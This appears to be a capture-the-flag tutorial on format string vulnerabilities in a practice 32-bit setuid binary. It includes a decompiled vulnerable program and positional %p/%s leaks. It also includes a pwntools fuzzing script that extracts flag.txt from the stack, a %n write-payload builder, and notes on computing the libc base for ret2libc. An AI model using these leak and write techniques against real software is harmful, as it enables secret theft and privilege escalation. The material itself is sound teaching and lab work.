description |
---|
08/26/2023 |
What will we be learning?
We will learn how to identify and exploit format string vulnerabilities in programs in order to leak addresses and other data off the stack.
{% embed url="https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" %}
{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/07-format_string_vulns" %} Grab the target binary here and other files {% endembed %}
{% file src="../.gitbook/assets/Format_String.pdf" %}
{% embed url="https://www.youtube.com/watch?v=iwNYoDw1hW4" %} The almighty CryptoCat {% endembed %}
sudo chown root:root format_vuln
sudo chmod 4655 format_vuln -- This will set the setuid bit (the leading 4), not the "sticky bit"
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
`file`:
{% code overflow="wrap" %}
format_vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=c6e50d7e3fe3796407a1827f21d01f343dbaf3fa, for GNU/Linux 3.2.0, not stripped
{% endcode %}
- 32-bit
- Dynamically linked to the `libc` library
- Not stripped
`checksec`:
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
- NX Enabled
A habit worth building is to simply run the binary and ask yourself: "What is the program doing? What is the point of the program? What conditions does it require?"
These questions build situational awareness and make it easier to follow what is happening on the stack when you later read the assembly or the decompilation.
Okay, we can see that the program is likely using `printf()` to echo our STDIN back to us.
Also, notice how we cannot overflow the buffer. Is `fgets()` being used to limit the input to the size of the buffer?
It also appears that we are in some type of loop.
I know that the video highlights source code analysis, but more often than not we have only the binary and no source code.
Load up the binary in Ghidra.
Decompilation of `main()` (variables have been renamed and conversions have been made):
void main(void)
{
  char buffer_1 [64];
  char buffer_2 [64];
  FILE *local_1c;
  __gid_t local_18;
  char *local_14;
  undefined *puStack_10;
  puStack_10 = &stack0x00000004;
  setvbuf(_stdout,(char *)0x0,2,0);
  local_14 = buffer_1;
  local_18 = getegid();
  setresgid(local_18,local_18,local_18);
  puts("We will evaluate any format string you give us with printf().");
  local_1c = fopen("flag.txt","r");
  if (local_1c == (FILE *)0x0) {
    puts("flag.txt is missing!");
    /* WARNING: Subroutine does not return */
    exit(0);
  }
  fgets(buffer_1,64,local_1c);
  do {
    printf("> ");
    fgets(buffer_2,64,_stdin);
    printf(buffer_2);
  } while( true );
}
Convert the original `0x40` argument of `fgets()` to decimal and you will see that it matches the size of our buffer (64 bytes): hex `0x40` is 64 in decimal.
Renamed variables pertaining to buffers to be easier to read:
- Both buffers are 64 bytes
- We see a variable that is a pointer (`*`)
- `fopen()` returns a pointer to a `FILE` stream for the file named `flag.txt`. The `"r"` argument opens the file for reading.
- Here, we aren't using `gets()`, but rather `fgets()`, which is not dangerous here because it reads at most 63 bytes of the flag (plus a terminating null byte) into the 64-byte buffer
- We will then use `printf()` to display `"> "` to act as a console prompt
- `fgets()` will then read our input from `_stdin`
- We then see that this `fgets()` call is also given the size of our 64-byte buffer. There is no overflow here because the input is limited to the size of the buffer.
- Lastly, we see `printf(buffer_2)`, which is where our vulnerability can be found
- Also, I felt it was important to mention that we loop while true, giving us an infinite loop and a never-ending program
The second `printf()` call is where the vulnerability lies.
The vulnerability is in how `printf()` is called: our input is passed as its first argument, the format string itself.
You might be asking yourself: the first `printf()` call has no format specifier arguments either, so why is that one not vulnerable? The first call prints the constant string `"> "`, which we cannot influence. The second `printf()` is passed `buffer_2`, which `fgets()` filled with our input from STDIN. Since our input is used directly as the format string, we fully control the format specifiers.
Anytime you print input from the user, you MUST supply a constant format string that says which type of data you expect, and pass the input as a separate argument, for example `printf("%s", buffer_2)`.
If the input itself is passed to `printf()` as the format string, the result is a Format String Vulnerability.
In other words, if the developer does NOT supply the format string, the attacker can supply one for the `printf()` call.
Check out this table to view what format specifiers look like in C:
Format Specifier | Type |
---|---|
%c | Character |
%d | Signed integer |
%e or %E | Scientific notation of floats |
%f | Float values |
%g or %G | Shorter of the %e/%E or %f representation |
%hi | Signed integer (short) |
%hu | Unsigned Integer (short) |
%i | Signed integer |
%ld or %li | Long |
%lf | Double |
%Lf | Long double |
%lu | Unsigned long |
%lli or %lld | Long long |
%llu | Unsigned long long |
%o | Octal representation |
%p | Pointer |
%s | String |
%u | Unsigned int |
%x or %X | Hexadecimal representation |
%n | Prints nothing; stores the number of characters written so far into the int pointed to by the argument |
%% | Prints % character |
{% embed url="https://vickieli.dev/binary%20exploitation/format-string-vulnerabilities/" %} This guide is OP {% endembed %}
Keep in mind that with this vulnerability we can print anything from the stack and, by following pointers, even data that is not located on the stack.
This includes:
- Global Offset Table (GOT) entries
- Any other readable address in the process's memory
So, with the Format String Vulnerability identified, and since the attacker can supply their own format specifiers, let's do so:
- We sent `%p` and got pointers back.
- We sent `%x` and got hex values back.
- We sent `%c` and got char values back.
If we tried to simply print out the values as a string using a string format specifier, we would segmentation fault.
Why is that?
This is because `%s` treats the value on the stack as a pointer and tries to read a string from that address. If the value is not a valid address within the program's mapped memory, the read fails and the program crashes with a segmentation fault.
In other words, `%s` treats the data on the stack as an address to go grab the string from. This is also known as pass by reference.
This means that we could even read from any address, even if the data is not located on the stack.
This is all stemming from the fact that we fully control the format string.
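The difference between `%p` and `%s` can be illustrated with a toy model. This is only a sketch in plain Python, not real process memory: the `STACK` and `MEMORY` contents, the address `0x0804A000`, and the helper names `fmt_p` and `fmt_s` are all made up for illustration.

```python
# Toy model: addresses and contents below are invented for illustration.
MEMORY = {0x0804A000: b"flag{demo}"}   # the only "mapped" string
STACK = [0x0804A000, 0x67616C66]       # values printf would treat as arguments


def fmt_p(index):
    """Model of %N$p: print the stack value itself."""
    return hex(STACK[index - 1])


def fmt_s(index):
    """Model of %N$s: treat the stack value as an address and read from it."""
    addr = STACK[index - 1]
    if addr not in MEMORY:
        # A real process would receive SIGSEGV here.
        raise MemoryError(f"segfault: {addr:#x} is not mapped")
    return MEMORY[addr].decode()
```

In this model `fmt_s(1)` follows a valid pointer and returns the string, while `fmt_s(2)` fails because `0x67616c66` is data, not a mapped address.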
What is the data in these values?
We can use `unhex` to convert these values because they are all hex values!
unhex 67616c66
galf
Interesting, that's flag backwards. It's represented this way due to little-endian.
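The same conversion can be done in Python, which also makes the byte order explicit. This is a small sketch; the helper name `unhex_le` is hypothetical and assumes a 4-byte word taken from a 32-bit little-endian target.

```python
import struct


def unhex_le(word_hex):
    """Decode a leaked hex word and undo the little-endian byte order."""
    raw = bytes.fromhex(word_hex)  # bytes in the order they were printed
    return raw[::-1]               # reverse to get the order in memory


# Equivalent view: pack the integer back into little-endian bytes.
in_memory = struct.pack("<I", 0x67616C66)
```

Reversing the printed bytes and packing the integer as little-endian give the same four bytes, which is why the leak reads backwards on screen.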
I wonder if we can find our flag in memory by leaking values from the stack 🤔.
A typo led me to discover that we can use `%m` (a glibc extension) to display the error message for the current value of `errno`:
Result
Explanation
Notice how `67616c66` is the fifth element that was printed.
If we use `printf()`'s positional arguments, we can print that exact value:
%5$x
67616c66
%5$p
0x67616c66
Interesting. Let's see if we can print out the entire flag from this leak.
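One way to do that is to request several consecutive positions and stitch the words back together. The sketch below assumes the flag occupies consecutive 4-byte stack slots; the helper names `positional_payloads` and `decode_leaks` are hypothetical, and any leak values you feed it in practice come from the target, not from this example.

```python
def positional_payloads(first, count):
    """Build one %N$p request per stack slot, e.g. %5$p, %6$p, ..."""
    return [f"%{i}$p".encode() for i in range(first, first + count)]


def decode_leaks(leaks, word_size=4):
    """Turn %p outputs back into the bytes as they sit in memory."""
    data = b""
    for token in leaks:
        # glibc prints a null pointer as "(nil)" instead of 0x0
        value = 0 if token == "(nil)" else int(token, 16)
        data += value.to_bytes(word_size, "little")
    # Stop at the first null byte, as a C string would
    return data.split(b"\x00", 1)[0]
```

Each payload would be sent at the `> ` prompt, and the responses collected into a list for `decode_leaks`. On a 64-bit target `word_size` would be 8.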
In `printf()`, we can use `%n` to store the number of characters written so far at the address given by the corresponding argument.
Remember, we FULLY control the format string.
This means that we can write arbitrary integers to the location pointed to by a function argument.
For example, the following code will store the integer 5 into the variable num_char.
int num_char;
printf("11111%n", &num_char);
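Because our own input sits on the stack, we can also place an arbitrary value, such as an address, inside the format string and have `printf()` use it as an argument. This is what turns a format string vulnerability into a way to write data using `%n`.
To find where our input lands among the arguments, send a recognizable marker followed by a positional specifier:
AAAA%10$p
This prints the four A's followed by the tenth argument. If that argument comes back as `0x41414141`, the tenth argument is the start of our input, and swapping `%p` for `%n` would write 4 (the number of characters printed so far) to address `0x41414141`.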
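As a rough sketch of how such a write payload is laid out on a 32-bit target: the target address goes first, padding raises the printed character count to the desired value, and a positional `%n` stores that count. The function name `build_write_payload`, the address, and the offset used with it are assumptions for illustration; the real offset has to be found on the target first.

```python
import struct


def build_write_payload(target_addr, value, offset):
    """Single-%n payload for a 32-bit target (illustrative sketch only)."""
    addr = struct.pack("<I", target_addr)  # 4 bytes, printed first
    # NUL ends the format string, newline ends fgets(), '%' starts a specifier
    if any(bad in addr for bad in (0x00, 0x0A, 0x25)):
        raise ValueError("address contains a byte that breaks the payload")
    pad = value - len(addr)  # characters still needed before %n
    if pad < 0:
        raise ValueError("value is smaller than the bytes already printed")
    fmt = b""
    if pad > 0:
        # Print argument 1 as a char padded to `pad` columns
        fmt += b"%1$" + str(pad).encode() + b"c"
    # Store the running character count at the address found at `offset`
    fmt += b"%" + str(offset).encode() + b"$n"
    return addr + fmt
```

For large values this approach prints a very large number of characters, which is why tools such as pwntools' `fmtstr_payload` split a write into smaller pieces.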
{% embed url="https://docs.pwntools.com/en/stable/fmtstr.html" %}
fuzz.py:
from pwn import *
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./format_vuln', checksec=False)
# Let's fuzz 100 values
for i in range(100):
    try:
        # Create process (level used to reduce noise)
        p = process(level='error')
        # When we see the user prompt '>', format the counter
        # e.g. %2$s will attempt to print second pointer as string
        p.sendlineafter(b'> ', '%{}$s'.format(i).encode())
        # Receive the response
        result = p.recvuntil(b'> ')
        # Check for flag
        # if("flag" in str(result).lower()):
        print(str(i) + ': ' + str(result))
        # Exit the process
        p.close()
    except EOFError:
        # The process crashed (e.g. %s followed an invalid pointer); try the next index
        pass
Result:
We are able to see the contents of flag.txt in the 39th element
Be sure to print as pointers (`%p`) rather than hex (`%x`) so that you get the full value! On 64-bit targets, `%x` prints only the low 4 bytes of each 8-byte value.
If a leaked address points to a libc function, we can subtract that function's offset within libc from the leaked address to get back to the libc base address and be able to perform ret2libc!
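The arithmetic is a single subtraction, sketched below. The function name `libc_base_from_leak` is hypothetical, and real offsets depend on the exact libc version in use on the target.

```python
def libc_base_from_leak(leaked_addr, symbol_offset):
    """Recover the libc base from a leaked address of a known libc symbol."""
    base = leaked_addr - symbol_offset
    # Libraries are mapped on page boundaries, so a valid base ends in 0x000
    if base & 0xFFF:
        raise ValueError("base is not page aligned; wrong symbol or libc version?")
    return base
```

Once the base is known, any other libc address is the base plus that symbol's offset. For example, with a made-up leak of `0xf7e12340` and a made-up offset of `0x52340`, the base would be `0xf7dc0000`. The page-alignment check is a cheap sanity test that catches a wrong symbol or a mismatched libc.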